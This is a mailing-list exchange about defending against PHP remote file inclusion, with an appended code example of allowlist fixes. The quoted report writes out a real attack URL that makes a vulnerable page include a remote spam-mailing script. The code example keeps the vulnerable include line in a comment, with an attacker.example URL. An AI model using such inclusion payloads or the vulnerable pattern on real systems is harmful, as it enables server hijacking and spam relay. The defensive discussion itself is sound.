[Modsecurity] Spam injection, very sneaky
Michal Wallace
michal at sabren.com
Fri Oct 13 17:11:47 EDT 2006
On Fri, 13 Oct 2006, MIKE YRABEDRA wrote:
> I have been using modsec to block all sorts of spam injection, but I have
> found a new one.
>
> I have a client that has a blanket-style page that includes anything sent
> to it. Like so...
>
> <? include($content); ?>
>
> So if someone does this...
>
> http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php?
>
> ...bad things happen. In my case over 100k of spam being relayed by my
> server.
>
> I caught this guy using modsec and searching ARGS with the same text as in
> the spam. This is OK for now, until he uses a different spam.
>
>
> The php script that did the damage can be seen here...
> http://home.arcor.de/dumpxpl/mail.php
>
> Is there a modsec rule that will prevent this sort of thing?
Hey Mike,
PHP's remote include "feature" is wrong on so many levels. One thing you can do in this case is have the client sanitize the $content variable so it doesn't do this. There's usually no reason it has to have the http:// in there, and if there is, you can limit it to the sites he actually wants to use.

Or he could just fetch the URL and print the contents, rather than using include().

Or you could patch PHP so it doesn't let this happen:
http://www.hardened-php.net/

At the very least, you should scan for http:// in the args. I'm surprised the gotroot rules didn't catch this. I'm pretty sure there was a rule that did this already for any php file.
Sincerely,
Michal J Wallace
Sabren Enterprises, Inc.
-------------------------------------
contact: michal at sabren.com
hosting: http://www.cornerhost.com/
my site: http://www.withoutane.com/
-------------------------------------
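The include pattern from Mike's report beside two of the fixes Michal suggests (an allowlist of local pages for include(), and fetch-and-print for the rare case a remote page is really wanted), as an added example that is not code from either poster; the page names, directory and the host in REMOTE_HOSTS are placeholders.

```php
<?php
// Added example, not from the thread. Directory, page and host names are placeholders.

// Vulnerable pattern (left commented out): the request decides what PHP executes.
// include($_GET['content']);   // ?content=http://attacker.example/mail.php

// Fix 1: map the parameter onto a fixed set of local files, so include()
// never sees user-supplied input at all.
const LOCAL_PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_local_page(?string $requested, string $default = 'home'): string
{
    // Exact key match only: URLs, "../" and null bytes simply miss and fall back.
    if ($requested !== null && array_key_exists($requested, LOCAL_PAGES)) {
        return LOCAL_PAGES[$requested];
    }
    return LOCAL_PAGES[$default];
}

// Fix 2: if remote content is genuinely needed, fetch it from an allowlisted
// host and treat the body as text. It is displayed, never executed.
const REMOTE_HOSTS = ['news.example.com'];   // placeholder allowlist

function fetch_remote_text(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if ($parts['scheme'] !== 'https'
        || !in_array(strtolower($parts['host']), REMOTE_HOSTS, true)) {
        return null;   // any host or scheme outside the allowlist is refused
    }
    $body = @file_get_contents($url);
    return $body === false ? null : $body;
}

// Usage: the local page is included; the remote body, if any, is HTML-escaped on output.
include resolve_local_page($_GET['content'] ?? null);
if (isset($_GET['feed']) && ($text = fetch_remote_text($_GET['feed'])) !== null) {
    echo '<pre>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</pre>';
}
```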